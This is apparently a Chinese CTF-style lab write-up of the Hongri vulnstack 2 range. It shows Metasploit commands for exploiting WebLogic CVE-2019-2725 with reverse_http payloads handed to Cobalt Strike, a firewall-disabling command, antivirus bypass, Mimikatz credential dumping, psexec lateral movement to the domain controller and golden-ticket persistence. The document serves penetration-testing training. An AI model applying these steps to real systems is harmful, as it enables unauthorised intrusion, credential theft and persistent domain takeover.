红日靶场第二关

本文详细记录了一次红队靶场实战过程,涉及环境配置、信息收集、Weblogic漏洞(CVE_2020_2551和CVE_2019_2725)利用、内网渗透、权限提升、域控攻取及权限维持。通过Weblogic SSRF漏洞获取系统权限,并利用MSF和CS进行内网横向移动,最终利用黄金票据维持权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

红日靶场第二关

一、环境配置

环境说明
内网网段:10.10.10.1/24
DMZ网段:192.168.111.1/24
测试机地址:192.168.111.1(Windows),192.168.111.11(Linux)
防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息
DC
IP:10.10.10.10OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80IP2:192.168.111.80OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201IP2:192.168.111.201OS:Windows 7(32)

环境配置踩坑点:当登录WEB虚拟机时,需要先恢复快照3,登陆时切换用户为:WEB\de1ay 密码:1qaz@WSX才能进入,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。

二、目标

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
    Bypass UAC
    Windows系统NTLM获取(理论知识:Windows认证)
    Access Token利用(MSSQL利用)
    WMI利用
    网页代理,二层代理,特殊协议代理(DNS,ICMP)
    域内信息收集
    域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
    域凭证收集
    后门技术(黄金票据/白银票据/Sid History/MOF)

三、WEB外网打点

3.1信息收集(nmap):

在这里插入图片描述

访问7001端口,发现作妖处:

在这里插入图片描述

3.2信息收集(dirsearch):

在这里插入图片描述

3.3漏洞检测

网上公开有漏洞,印象深刻的是未授权的漏洞,但是进去之后很难找到用户名和密码,直接用weblogic漏洞工具检测。

存在CVE_2020_2551漏洞

在这里插入图片描述

存在CVE_2019_2725漏洞

在这里插入图片描述

CVE_2019_2725漏洞对应JAVA反序列化漏洞,可以直接工具。

拿下服务器:

在这里插入图片描述

在这里插入图片描述### 3.4更新(无关闭防火墙上线)

通过上面的weblogic扫描发现,SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

MSF:
> use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
> set rhosts 192.168.235.80
> set lhost 192.168.235.129
> set target 1
> set payload windows/meterpreter/reverse_http
> background 拿到session 1 
弹给CS:
> use exploit/windows/local/payload_inject
> set payload windows/meterpreter/reverse_http
> set DisablePayloadHandler true
> set lhost 192.168.111.129
> set lport 3333
> set session 1

上线后提权,后续步骤一样:

在这里插入图片描述

四、内网渗透

4.1 上线CS

4.1.1 发现360杀软

在这里插入图片描述

4.1.2 powershell绕过360杀软

在这里插入图片描述

反弹CS成功:

在这里插入图片描述

4.2 信息收集

4.2.1 判断是否存在域

ipconfig /all ,DNS后缀de1ay.com,存在域

在这里插入图片描述

net config workstation

在这里插入图片描述

4.2.2 提权(MS14-58)

测试权限shell net view /domain

在这里插入图片描述

提权成功

在这里插入图片描述

在这里插入图片描述

4.2.3 获取凭证
access—>hash dump

在这里插入图片描述

Mimikatz抓取

在这里插入图片描述

在这里插入图片描述

4.2.4 继续信息收集
ipconfig /all
net config workstation                      # 当前登录域
netsh advfirewall set allprofiles state off # 关闭防火墙

net time /domain                       # Ping获取域控IP
nltest /dsgetdc:<domain_name>          # 也可以获取域控IP

net view /domain
net view                                 # 域内主机
net user /domain                         # 域内用户
net group "domain admins" /domain        # 域管理员
net group "domain controllers" /domain   # 域控

域内主机:

在这里插入图片描述

资产收集:(ICMP)协议

在这里插入图片描述

在这里插入图片描述

4.2.5 开启3389

在这里插入图片描述

4.3 内网横向

4.3.1 MSF联动CS
  • 通过payload_inject将Shell发给CS
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject 
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.111.2
msf6 exploit(windows/local/payload_inject) > set LPORT 10080
msf6 exploit(windows/local/payload_inject) > set session 1
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf6 exploit(windows/local/payload_inject) > run
4.3.2 CS联动MSF
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用x64
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run
4.3.3 上线CS目标

portscan 10.10.10.1/24 445 arp 200

在这里插入图片描述
)]

4.4 psexec传递

4.4.1 拿下PC

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalStrike本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec:在主机上使用服务派生会话 )

在这里插入图片描述
)]

4.4.2 拿下DC
4.4.1 配置监听

在这里插入图片描述

4.4.2 psexec传递给DC

拿下域控!!!

在这里插入图片描述

五、权限维持(黄金票据)

5.1 查看账户NTLM HASH和SID值

在这里插入图片描述

在这里插入图片描述

5.2 黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
  • WEB机 Administrator 权限机器->右键->Access->Golden Ticket

在这里插入图片描述

运行中

在这里插入图片描述

5.2.1伪造用户名成功

shell dir \DC\C$

在这里插入图片描述

### 红日靶场的概述 红日靶场是由红日安全团队开发的一系列用于网络安全测试和渗透测试的学习平台。这些靶场旨在帮助学习者通过实际操作掌握网络攻击与防御的技术细节[^1]。 #### 红日靶场的功能特点 红日靶场提供了多个版本,例如 `vulnstack` 系列中的不同版本(如 vulnstack-7),每个版本都模拟了一个真实的网络环境,包含了多种常见的漏洞场景供用户实践。例如,在 `vulnstack-7` 中,可以通过访问其官网获取详细的漏洞描述和技术背景信息[^2]。 #### 域控制器的操作方法 在某些红日靶场环境中,可以利用命令行工具来查看域控制器的信息。例如,使用以下命令可以列出当前域下的所有域控制器: ```bash net group "domain controllers" /domain ``` 这一步对于了解目标网络结构非常重要,尤其是在涉及 Active Directory 的渗透测试中[^3]。 #### 远程连接到域控制器 一旦获得了域控制器的 IP 地址,就可以尝试通过远程桌面协议 (RDP) 登录到该服务器上。如果已知默认管理员账户及其密码,则可以直接登录并进一步探索内部资源。需要注意的是,在真实环境下不应未经授权执行此类操作;而在练习过程中为了简化流程可能会提供明文凭据,比如用户名为 `administrator`,密码为 `Admin12345`[^4]。 #### 存活主机探测技术 针对内网中存在的其他潜在可攻陷设备,Metasploit Framework 提供了几种有效的扫描模块来进行存活检测。以下是几个常用的辅助模块示例: - **UDP Sweep**: 使用 UDP 数据包批量发送请求以识别响应节点。 ```ruby use auxiliary/scanner/discovery/udp_sweep ``` - **NetBIOS Name Query Scanner**: 针对 Windows 平台上的 NetBIOS 协议实现服务名称解析功能。 ```ruby use auxiliary/scanner/netbios/nbname ``` 以上提到的方法均需谨慎对待,并仅限于合法授权范围内的实验用途[^5]。 ### 注意事项 尽管上述内容有助于理解如何开展基础性的信息安全评估活动,但在任何情况下都不应滥用所学技能去损害他人利益或违反法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值